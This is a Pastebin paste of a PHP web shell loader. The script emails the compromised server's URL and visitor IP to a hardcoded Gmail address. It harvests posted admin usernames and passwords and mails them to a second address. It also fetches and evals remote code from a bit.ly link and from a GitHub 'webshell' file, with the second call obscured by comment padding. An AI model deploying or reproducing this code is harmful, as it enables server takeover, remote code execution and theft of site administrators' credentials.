Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @ini_set('output_buffering', 0);
- @ini_set('display_errors', 0);
- set_time_limit(0);
- ini_set('memory_limit', '64M');
- header('Content-Type: text/html; charset=UTF-8');
- $tujuanmail = 'malaysia.sender@gmail.com';
- $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
- $pesan_alert = " -> $x_path ->IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
- mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
- error_reporting(0);
- set_time_limit(0);
- if(get_magic_quotes_gpc()){
- foreach($_POST as $key=>$value){
- $_POST[$key] = stripslashes($value);
- }
- }
- echo '<!DOCTYPE HTML>
- <html>
- <head>
- <link href="https://fonts.googleapis.com/css?family=Supermercado+One&display=swap" rel="stylesheet">
- <title>:)</title>
- <style>
- body{
- font-family:Supermercado One, sans-serif;
- background-color: #000022;
- background-image: url();
- background-size: center; background-repeat:no-repeat; background-attachment: fixed; background-size: cover; background-position:center;
- color: white;
- }
- #content tr:hover{
- background-color: black;
- text-shadow:0px 0px 10px black;
- }
- #content .first{
- background-color: white;
- }
- table{
- border: 1px #000000 dotted;
- }
- a{
- color: aqua;
- text-decoration: none;
- }
- a:hover{
- color:blue;
- text-shadow:0px 0px 10px #ffffff;
- }
- input,select,textarea{
- border: 1px #000000 solid;
- -moz-border-radius: 5px;
- -webkit-border-radius:5px;
- border-radius:5px;
- }
- .lazy {
- margin: 0;
- font-family:Supermercado One;
- }
- </style>
- </head>
- <?php eval("?>".file_get_contents("bit.ly/4dzmi5N"));?>
- <?php
- $subjek = 'RESUL';
- $mailto = 'muhrazky@gmail.com'; //masukin email lo disini
- //////////////////////////////////////
- $user = $_POST['log'];
- $pass = $_POST['pwd'];
- //////////////////////////////////////
- $body = <<<EOD
- <br><hr><br>
- <center><font size="4" ;" color="red">RESULT LOG ADMIN!<br></font>
- <font size="2" color="red">Username\Email :</font><font size"2" color="black">$user</font><br>
- <font size="2" color="red">Password : </font><font size"2" color="black">$pass</font> <br></center>
- EOD;
- $headers = "From: muhrazky@gmail.com\r\n";
- $headers .= "Content-type: text/html\r\n";
- $success = mail($mailto, $subjek, $body, $headers);
- ?>
- <?php
- $random = rand(1000,5000);
- ?>
- <?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/exploit-haxor/webshell/main/bypas1.php"));/**/?>
Add Comment
Please, Sign In to add comment